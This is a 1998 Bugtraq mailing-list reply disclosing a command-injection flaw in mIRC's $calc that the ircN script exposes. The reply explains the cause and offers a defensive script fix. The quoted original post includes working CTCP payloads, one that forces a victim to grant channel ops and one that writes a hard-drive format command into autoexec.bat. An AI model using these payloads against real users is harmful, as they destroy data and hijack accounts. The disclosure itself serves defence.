[7372] in bugtraq
Re: Backdoor in ircN, popular mIRC script.
daemon@ATHENA.MIT.EDU (Benoit Lefebvre)
Fri Jul 24 00:27:50 1998
Date: Thu, 23 Jul 1998 22:57:46 +0000
Reply-To: Benoit Lefebvre <mox@SHELLZ.NETREVOLUTION.COM>
From: Benoit Lefebvre <mox@SHELLZ.NETREVOLUTION.COM>
X-To: Nick Koscianski <kkr@engulf.com>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <35B7DC39.2F26@engulf.com>
The bug is not only in ircN
It is in mIRC.
The problem is $calc(..)
ircN is just one of the script who use $calc to check the ping delay
eg: on 1:CTCPREPLY:PING*: { echo -a Ping reply: $calc($ctime - $2) }
To protect yourself, add that to your script
on 1:CTCPREPLY:PING*: { if ($2 !isnum) { halt } }
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
___/ ___/ _____/ __/ __/ Benoit Lefebvre
____/ ____/ __/ __/ __/__/ MoxImages
__/___/__/ ___/ ___/ ___/ @shellz.netrevolution.com
__/ _/ __/ __/ __/ __/ __/ http://www.mox.qc.ca/
__/ __/ _____/ __/ __/ ICQ: 858084
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
On Thu, 23 Jul 1998, Nick Koscianski wrote:
> A backdoor has been found in ircN, possibly the most popular mIRC
> script. Using the command /ctcpreply, any user can make someone using
> the backdoored versions do whatever they want. For example:
> /ctcpreply Dianora ping $mode(#us-opers,+o,hax0r)
> will force Dianora to give ops to hax0r in #us-opers.
>
> also, they can be forced to run arbitrary programs, for example:
>
> /ctcpreply Dianora $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)
> will format this person's hard drive..definately not good.
>
> A bug fix for this problem can be found at http://www.vode.org/ircN
>
>
> -KKR
>
